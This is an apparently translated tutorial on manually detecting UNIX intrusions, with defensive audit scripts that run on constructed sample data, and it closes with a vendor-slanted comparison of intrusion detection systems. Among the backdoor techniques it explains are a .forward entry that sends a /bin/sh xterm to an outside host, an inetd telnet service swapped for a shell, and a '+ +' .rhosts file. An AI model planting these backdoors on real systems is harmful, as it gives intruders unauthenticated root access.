UNIX Intrusion Monitoring
From: http://www.1717happy.com/?Action=show&id=102

Because Unix systems often carry key workloads, they are frequently the first choice of target for intruders. Intrusion detection and system protection are therefore among an administrator's most important tasks. So, without any additional tools, how can we judge the current security state of a system, and how can we discover an intrusion? The following describes some common manual checks, using Linux and Solaris as examples:
1. Check the system password file
First, check the passwd file with ls -l /etc/passwd and look at the file's modification date.
Enter awk -F: '$3 == 0 {print $1}' /etc/passwd to list the privileged users in the passwd file; every account with UID 0 will be printed. While you are at it, check whether the system has any account with an empty password: awk -F: 'length($2) == 0 {print $1}' /etc/shadow
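The two awk checks above, wrapped into a small audit that runs on constructed sample data. This is an added example, not code from the original article: the passwd and shadow contents below are made up to show one extra UID 0 account ("toor") and one account with an empty password ("alice"); on a live host point the functions at /etc/passwd and /etc/shadow (reading the shadow file requires root).

```shell
#!/bin/sh
# Added example: audit a passwd/shadow pair for UID 0 accounts and
# empty-password accounts. The two files below are constructed sample
# data, not real system files.

# Print every account whose UID (field 3) is 0. On a clean system this
# prints exactly one line: root.
uid0_accounts() {
    awk -F: '$3 == 0 {print $1}' "$1"
}

# Print every account whose password field (field 2) is empty, i.e. one
# that can log in without any password. Locked accounts ("*" or "!") are
# not reported because their field is not empty.
empty_password_accounts() {
    awk -F: 'length($2) == 0 {print $1}' "$1"
}

# Constructed sample /etc/passwd: "toor" is a second UID 0 account of the
# kind an intruder adds so that "root" itself looks untouched.
SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
toor:x:0:0::/tmp/.x:/bin/sh
EOF

# Constructed sample /etc/shadow: "alice" has an empty password field.
SAMPLE_SHADOW=$(mktemp)
cat > "$SAMPLE_SHADOW" <<'EOF'
root:$6$saltsalt$hashhashhash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice::19000:0:99999:7:::
toor:!:19000:0:99999:7:::
EOF
trap 'rm -f "$SAMPLE_PASSWD" "$SAMPLE_SHADOW"' EXIT

# Warn about anything beyond the expected state (only root has UID 0,
# nobody has an empty password). Returns 1 if a warning was printed.
audit_accounts() {
    passwd_file=$1 shadow_file=$2 status=0
    for u in $(uid0_accounts "$passwd_file"); do
        [ "$u" = root ] || { echo "WARNING: extra UID 0 account: $u"; status=1; }
    done
    for u in $(empty_password_accounts "$shadow_file"); do
        echo "WARNING: account without a password: $u"; status=1
    done
    return $status
}

audit_accounts "$SAMPLE_PASSWD" "$SAMPLE_SHADOW" || echo "account audit found problems"
```

Both checks are pure text processing on the two files, so they can be run from a read-only rescue medium against a mounted disk even if the host's own shell utilities are not trusted.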
2. Check the processes for anything strange
Look particularly at: ps -aef | grep inetd
inetd is the UNIX Internet services daemon, and the PID of a normally started inetd is relatively high. If you see output like inetd -s /tmp/.xxx, concentrate on what follows inetd -s. Under normal circumstances the inetd service on Linux has no -s parameter, and inetd is certainly not used to start a file. On Solaris it is only inetd -s, again without starting any particular file. If ps shows that inetd started a file and you did not start it that way, someone has intruded into your system and started a simple backdoor with root permission.
Enter ps -aef and go through the output, looking especially for processes whose command starts with ./xxx. Once a suspicious process is found, look for the backdoor program the intruder left behind and run kill -9 PID to kill the process. Then run ps -aef again to check whether it is really gone; if such a process is killed and comes back, a script that automatically restarts the program has been planted on the system. At that point a careful search is needed: find / -name <program name> -print. If the system really has been backdoored, the directory in which the program is found is the next clue. Note that on UNIX the ps binary itself is sometimes replaced in order to hide processes; detecting this means checking file integrity, which we discuss later. Next, locate the directory on the server where the attacker's files live and track them step by step.
3. Check the system daemons
Check the /etc/inetd.conf file: enter cat /etc/inetd.conf | grep -v "^#". The output is the list of remote services enabled on your machine. Intruders can create a backdoor simply by replacing one of the in.xxx programs, for example replacing in.telnetd with /bin/sh and then restarting the inetd service. After that, anyone who telnets to the server gets a root shell directly, without entering a username and password.
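The checks from sections 2 and 3 as one script, run over constructed sample input. This is an added example and not code from the article: the inetd.conf and ps -aef excerpts below are made up (a telnet entry pointed at /bin/sh, an inetd started with a file argument, a process running from ./), and on a live host the functions would be fed /etc/inetd.conf and a saved copy of ps -aef output instead.

```shell
#!/bin/sh
# Added example (not from the original article): audit the active inetd
# services and the process list for the signs described above. Both inputs
# are constructed sample data written to temporary files.

# Print only the active lines of an inetd.conf (drop comments and blanks).
active_inetd_services() {
    grep -v '^[[:space:]]*#' "$1" | grep -v '^[[:space:]]*$'
}

# Warn about services whose server program (field 6) is a shell, lives
# under /tmp, or sits in a hidden (dot) path. Returns 1 if any were found.
suspicious_inetd_services() {
    active_inetd_services "$1" | awk '
        $6 ~ /\/(sh|bash|csh|ksh)$/ || $6 ~ /^\/tmp\// || $6 ~ /\/\./ {
            print "WARNING: service " $1 " is served by " $6; found = 1
        }
        END { exit (found ? 1 : 0) }'
}

# Warn about (a) an inetd started with a file argument such as
# "inetd -s /tmp/.xxx" and (b) any process run as ./something.
# Input is "ps -aef" output: UID PID PPID C STIME TTY TIME CMD [args].
suspicious_processes() {
    awk '
        $8 ~ /(^|\/)inetd$/ {
            for (i = 9; i <= NF; i++)
                if ($i ~ /^\//) { print "WARNING: PID " $2 " inetd started with file " $i; found = 1 }
        }
        $8 ~ /^\.\// { print "WARNING: PID " $2 " runs from the current directory: " $8; found = 1 }
        END { exit (found ? 1 : 0) }' "$1"
}

# Constructed /etc/inetd.conf: the telnet service has been pointed at a shell.
SAMPLE_INETD_CONF=$(mktemp)
cat > "$SAMPLE_INETD_CONF" <<'EOF'
# constructed inetd.conf sample
ftp     stream  tcp  nowait  root  /usr/sbin/in.ftpd   in.ftpd
telnet  stream  tcp  nowait  root  /bin/sh             sh -i
echo    stream  tcp  nowait  root  internal
EOF

# Constructed "ps -aef" output: a normal inetd, a second inetd started with
# a file under /tmp, and a user process running from a hidden ./ path.
SAMPLE_PS=$(mktemp)
cat > "$SAMPLE_PS" <<'EOF'
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Jan01 ?        00:00:01 init
root       612     1  0 Jan01 ?        00:00:00 inetd
root     31337     1  0 10:02 ?        00:00:00 inetd -s /tmp/.xxx
alice     4021  4000  0 10:05 pts/0    00:00:00 ./.x
alice     4022  4000  0 10:05 pts/0    00:00:00 grep inetd
EOF
trap 'rm -f "$SAMPLE_INETD_CONF" "$SAMPLE_PS"' EXIT

suspicious_inetd_services "$SAMPLE_INETD_CONF" || echo "inetd.conf needs attention"
suspicious_processes "$SAMPLE_PS" || echo "process list needs attention"
```

Because ps itself may have been replaced, the process listing is worth taking from a trusted binary (a rescue medium) and saving to a file first; the awk filters then work on that file.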
4. Check network connections and listening ports
Enter netstat -an to list all connections and listening ports on the local machine and check for any illegal connections.
Enter netstat -rn to check whether the local routing table and gateway settings are correct.
Enter ifconfig -a to view the network interface settings.
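A way to make the netstat -an review less error-prone: compare the listening TCP ports against the list of ports the host is supposed to serve, and print the distinct peers of established connections for review. This is an added example, not code from the article; the netstat output below is constructed (sshd and smtp listening as expected, an unexpected listener on port 31337, and a connection to it from 203.0.113.7, a documentation address). On a live host save netstat -an to a file and pass that.

```shell
#!/bin/sh
# Added example (not from the original article): compare listening TCP
# ports from "netstat -an" output against an allow list and list the
# peers of established connections. The netstat output is constructed.

# $1: file with netstat -an output; $2: space-separated allowed TCP ports.
# Prints a warning per unexpected listener and returns 1 if any were found.
unexpected_listeners() {
    awk -v allowed=" $2 " '
        $1 ~ /^tcp/ && $NF == "LISTEN" {
            n = split($4, a, ":"); port = a[n]    # last component of 0.0.0.0:22, :::22, ...
            if (index(allowed, " " port " ") == 0) {
                print "WARNING: unexpected listener on tcp port " port " (" $4 ")"; found = 1
            }
        }
        END { exit (found ? 1 : 0) }' "$1"
}

# Print the distinct foreign addresses (port stripped) of established TCP
# connections, one per line, so they can be compared with known clients.
established_peers() {
    awk '$1 ~ /^tcp/ && $NF == "ESTABLISHED" {
            peer = $5; sub(/:[0-9*]+$/, "", peer); print peer
        }' "$1" | sort -u
}

# Constructed "netstat -an" output.
SAMPLE_NETSTAT=$(mktemp)
cat > "$SAMPLE_NETSTAT" <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:31337           0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:22             10.0.0.9:51044          ESTABLISHED
tcp        0      0 10.0.0.5:31337          203.0.113.7:40022       ESTABLISHED
udp        0      0 0.0.0.0:514             0.0.0.0:*
EOF
trap 'rm -f "$SAMPLE_NETSTAT"' EXIT

# This host is only supposed to serve ssh (22) and smtp (25).
unexpected_listeners "$SAMPLE_NETSTAT" "22 25" || echo "listener review needed"
echo "Established peers:"; established_peers "$SAMPLE_NETSTAT"
```

Keeping the allow list in a file maintained off the host turns this from a one-off inspection into a check that can be repeated after every change.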
5. Check the system logs
Run last | more to view the history of all users who have logged on to the local machine. However, the last command depends on the syslog process, which has become an important target of intruders. Intruders usually stop the system syslog, so look at the syslog process and determine whether its last start time is normal; because syslog runs as root, any illegal syslog activity indicates a major intrusion event.
Enter ls -al /var/log on Linux
Enter ls -al /var/adm on Solaris
Check whether the integrity and modification times of the wtmp and utmp files, as well as the messages file, are normal. Tampering with these files is also a way intruders erase their traces by hand.
6. Check for core files on the system
Sending malformed requests to a server's service in order to break in is a conventional intrusion technique; the typical example is an RPC attack. It has only a certain success rate, that is, it does not succeed 100% of the time, and a failed attempt usually leaves a core file in the working directory of the attacked service. Search the whole system for core files: find / -name core -exec ls -l {} \; and then judge from the directory in which each core file lies whether it points to an intrusion attempt.
7. Check system file integrity
There are several ways to check file integrity. The simplest is to run ls -l <filename> and compare the result with what you expect; this is crude but practical. It becomes troublesome, however, if ls itself has been replaced. On Linux you can run rpm -V `rpm -qf <filename>` and check whether the result is normal to determine whether the file is intact. There are many other ways to use RPM to check file integrity on Linux; we will not repeat them here, and man rpm lists more formats.
In Unix systems, /bin/login is a file that intruders often replace with a backdoored version. Let us talk about the login backdoor:
In UNIX the login program is used to verify the passwords of Telnet users. An attacker can obtain and modify the source code of login so that it checks for a backdoor password before the entered password is verified and recorded. If the backdoor password is typed, the password set by the administrator is ignored and the attacker walks straight in: this lets an intruder access any account, even root. Because the backdoor check happens before the login is recorded in utmp and wtmp, the intruder can reach a shell without the account ever being exposed. Once administrators became aware of this backdoor they used the strings command to search the login program for text, and in many cases the backdoor password was exposed; intruders then started to encrypt or otherwise hide the password to defeat strings. Therefore many administrators use an MD5 checksum to detect such backdoors. The md5sum command is available on Unix systems; enter md5sum <filename> to print the MD5 signature of the file. Its options are: md5sum -b reads files in binary mode; md5sum -c checks MD5 signatures against a previously saved list; md5sum -t reads files in text mode.
As mentioned above, inetd.conf is the configuration file of the services daemon, and the lines in it that are not commented out must be compared carefully. For example, if the telnet service is enabled, the configuration contains a line like: telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd
The program used is /usr/sbin/in.telnetd; check the integrity of that file. Intruders often create a backdoor for themselves by replacing one of the service programs that inetd is allowed to start.
On Linux the /etc/crontab file is also often used by intruders. To check it, simply cat /etc/crontab and read carefully whether the file has been used by an intruder to do other things.
A backdoor started as a process, without replacing files such as login, has one defect: the process dies once the system restarts, so the intruder has to make the backdoor start at boot. Check the files under /etc/rc.d to see whether the system starts a backdoor at boot.
Also worth mentioning: if you find in some directory a file such as xxx.sh with the attributes -rwsr-xr-x 1 root, any user who runs it obtains a root shell. This is a setuid file. Run find / -perm -4000 -print to search the whole system for such files, and then delete any such files that do not belong to the system.
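The md5sum and setuid checks of this section, combined into a baseline-and-compare procedure. This is an added example and not the article's own code: it builds a constructed directory tree under a temporary directory, records checksums and the setuid inventory, then simulates the two changes the text describes (a replaced login binary and a new setuid file in a hidden directory) and reports them. On a real host the same two functions would be run over /bin, /sbin, /usr/bin and so on, with the baseline stored off the host, since a baseline kept on the machine can be rewritten by the same intruder who replaced the binaries.

```shell
#!/bin/sh
# Added example (not from the original article): record a baseline of md5
# checksums and setuid files for a tree, then report what changed. The tree
# below is constructed in a temporary directory.

# Record md5 checksums of every regular file under $1 into $2, and the
# sorted list of setuid files under $1 into $3.
record_baseline() {
    find "$1" -type f -exec md5sum {} + | sort -k2 > "$2"
    find "$1" -type f -perm -4000 | sort > "$3"
}

# Print the path of every file whose checksum no longer matches the
# baseline list in $1 (md5sum -c prints "path: FAILED" for those).
changed_files() {
    md5sum -c "$1" 2>/dev/null | grep -v ': OK$' | sed 's/: FAILED.*//'
}

# Print setuid files now present under $1 that are absent from the baseline
# list in $2 (both lists are sorted, so comm can compare them).
new_setuid_files() {
    find "$1" -type f -perm -4000 | sort | comm -13 "$2" -
}

# Constructed tree standing in for /bin: a login, an ls and a setuid passwd.
demo_root=$(mktemp -d)
mkdir "$demo_root/bin"
printf 'real login\n' > "$demo_root/bin/login"
printf 'real ls\n'    > "$demo_root/bin/ls"
printf 'passwd\n'     > "$demo_root/bin/passwd"
chmod u+s "$demo_root/bin/passwd"

BASE_SUMS=$(mktemp)
BASE_SUID=$(mktemp)
trap 'rm -rf "$demo_root" "$BASE_SUMS" "$BASE_SUID"' EXIT
record_baseline "$demo_root" "$BASE_SUMS" "$BASE_SUID"

# Simulate the tampering described in the text: login is replaced, and a
# setuid shell copy is dropped in a hidden directory.
printf 'trojaned login\n' > "$demo_root/bin/login"
mkdir "$demo_root/.hidden"
printf 'sh\n' > "$demo_root/.hidden/.sh"
chmod u+s "$demo_root/.hidden/.sh"

echo "Changed files:";    changed_files "$BASE_SUMS"
echo "New setuid files:"; new_setuid_files "$demo_root" "$BASE_SUID"
```

The comparison deliberately uses md5sum -c on the saved list rather than recomputing and eyeballing hashes, and comm on two sorted inventories, so that the output is only the differences; on a clean host both functions print nothing.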
8. Check for kernel-level backdoors
If such a backdoor has been installed on your system, it is usually troublesome to deal with. First, check the modules loaded by the system: use the lsmod command on Linux and the modinfo command on Solaris. Note that by default Linux has few modules loaded, usually just the network card driver, whereas Solaris has many; there is no shortcut, they have to be analysed one by one. Once the kernel has been hardened, inserting and deleting modules should be prohibited to protect the system; otherwise an intruder may replace system calls again. We can achieve this by replacing create_module() and delete_module(). The kernel should be hardened as early as possible to prevent system calls from being replaced by intruders. If a backdoor module is loaded it will not be displayed in the module list /proc/modules. In that case you need to search the /proc directory carefully and identify hidden and disguised processes from the files you find and from experience. Of course, the directory may not be hidden at all.
9. .rhosts and .forward
These are two well-known backdoor files. To check whether intruders have installed backdoors on your system, search for these two files globally:
find / -name ".rhosts" -print
find / -name ".forward" -print
A .rhosts file under a user's $HOME that contains only the two characters + + is very dangerous: if port 513 (the rlogin port) is open on your system, anyone can log on as that user without any authentication.
In UNIX, placing commands in the .forward file is a common way to regain access. The .forward under $HOME may be set as follows:
username | "/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
A variant of this method changes the system mail alias file (usually /etc/aliases). Note that this is only a simple transformation; a more advanced one runs a simple script from .forward that executes arbitrary commands taken from standard input (after some preprocessing). smrsh can effectively stop such backdoors (although there are probably still problems if you allow users to run Elm's filter or procmail). On Solaris, if you run the following command:
ln -s /var/mail/luser ~/.forward
then, if vacation is enabled, /var/mail/luser will be copied to ~/.forward, "|/usr/bin/vacation me" will be appended, and the old symlink will be moved to ~/.forward..backup.
You can also simply delete these two files.
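A sweep for the two files described in this section, as an added example that is not part of the original article. It builds five constructed home directories under a temporary directory (a .rhosts naming a specific host, a .rhosts containing "+ +", a .forward piping into vacation, a .forward with a plain address, and a .forward that is a symbolic link) and reports the ones that need attention. On a live host pass the real home directory roots (/home, /root and any other home listed in /etc/passwd) instead of the temporary directory.

```shell
#!/bin/sh
# Added example (not from the original article): sweep home directories for
# .rhosts files that trust everyone and for .forward files that run
# commands or are symlinks. The home directories below are constructed.

# Report .rhosts files containing a line of "+ +" or a lone "+" (any host,
# any user). Returns 1 if at least one was found.
check_rhosts() {
    hits=$(find "$1" -type f -name .rhosts \
           -exec grep -l -E '^[[:space:]]*\+([[:space:]]+\+)?[[:space:]]*$' {} + 2>/dev/null)
    [ -n "$hits" ] || return 0
    for f in $hits; do echo "WARNING: $f trusts any host and any user"; done
    return 1
}

# Report .forward files that pipe mail into a command ("|...") and .forward
# files that are symbolic links (the vacation trick described above). Every
# hit needs a manual look. Returns 1 if at least one was found.
check_forward() {
    pipes=$(find "$1" -type f -name .forward -exec grep -l '|' {} + 2>/dev/null)
    links=$(find "$1" -type l -name .forward 2>/dev/null)
    [ -n "$pipes$links" ] || return 0
    for f in $pipes; do echo "WARNING: $f pipes mail into a command"; done
    for f in $links; do echo "WARNING: $f is a symbolic link"; done
    return 1
}

# Constructed home directories.
HOMES=$(mktemp -d)
trap 'rm -rf "$HOMES"' EXIT
mkdir -p "$HOMES/alice" "$HOMES/bob" "$HOMES/carol" "$HOMES/dave" "$HOMES/erin"
printf 'trusted.example.com alice\n' > "$HOMES/alice/.rhosts"   # specific host and user: not flagged
printf '+ +\n' > "$HOMES/bob/.rhosts"                            # any host, any user: flagged
printf '"|/usr/bin/vacation carol"\n' > "$HOMES/carol/.forward"  # pipe into a program: flagged for review
printf 'dave@example.com\n' > "$HOMES/dave/.forward"             # plain forwarding address: not flagged
ln -s /var/mail/erin "$HOMES/erin/.forward"                      # symlink: flagged

check_rhosts "$HOMES"  || echo ".rhosts review needed"
check_forward "$HOMES" || echo ".forward review needed"
```

The pipe check intentionally flags legitimate uses such as vacation too: the point of the sweep is to produce a short list that a person then reads, since only the content of the piped command tells a mail filter from a backdoor.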
10. Defects of manual intrusion detection
I have described some manual intrusion detection methods, but these methods have defects, some of them unavoidable. This is why manual detection is "physical labour". Let us look at these defects:
1) Manual intrusion detection can only be performed on the host. That is, all of the detection work takes place within the operating system, which is an inherent limitation; essentially every intrusion that happens outside the operating system goes undetected. Network-level intrusions and attacks on switches and routers are invisible to the server's operating system. Once information has left the host, the host's operating system will never know if it is intercepted in transit.
2) Manual intrusion detection requires you to be proficient in the operating system and to keep your knowledge of vulnerabilities current. You must be a hacker as well as a network administrator. It is fair to say that personal experience can never keep up with the flow of vulnerability information from around the world, so it is hard to protect the system against new vulnerabilities.
3) Manual intrusion detection is after the fact. An intrusion is judged from a specific situation and then met with corresponding preventive measures; it cannot describe attacks in advance from the behaviour of intruders, define event severity levels, and prevent the next intrusion without affecting the normal operation of the system.
4) Manual intrusion detection can discover some vulnerabilities on the host, after which corresponding security measures can be taken. However, it cannot prevent a second intruder from using the same vulnerability to attack the host; that is, it cannot determine the attack pattern in order to cut the intrusion off.
5) In conclusion, manual intrusion detection only treats the symptoms of system security and relies mostly on the skills and experience of administrators; it cannot form a real security system. Although it is better than nothing and can detect and track some intrusions, it is hard to catch the trail of intruders who are themselves proficient in the system.
11. Comparison of intrusion detection systems
Building a real security system requires an intrusion detection system (IDS). An excellent IDS, coupled with the skills and experience of the system administrator, can form a real security system that effectively judges and cuts off intrusions and protects hosts and data. Some people regard ISS's RealSecure as an excellent intrusion detection system. In fact RealSecure has certain defects. Leaving aside its false positives and other misreported events, it is English-language software that is hard to use and get familiar with. Being foreign software, it has been studied in depth by many hackers, who have discovered some of its vulnerabilities, even inherent ones; I have tested some attack techniques that can paralyse RealSecure. In addition, RealSecure runs on the server's operating system, so when the operating system stops working, so does it. Put simply, the attacker's target is often RealSecure itself. Imagine that your system depends on the intrusion detection system and the IDS is destroyed by the attacker: your system is then wide open, with unimaginable consequences.
Chinese intrusion detection systems are of course a different matter. The Tianyao detection engine is a typical example. It has its own "black box": when an intruder attacks a server, it is almost impossible for him to discover the Tianyao detection engine running on it, which greatly increases the difficulty of the attack and the security of the server. Information about Tianyao can be found at http://www.venustech.com.cn.
To summarise: manual intrusion detection only treats the symptoms of system security and relies mostly on the skills and experience of administrators, so it cannot form a real security system on its own. It is better than nothing and can detect and track some intrusions, but it is hard to catch the trail of intruders who are themselves proficient in the system. To build a real security system you must use an intrusion detection system; an excellent IDS, coupled with the skills and experience of the system administrator, can form a real security system that effectively judges and cuts off intrusions and protects hosts and data.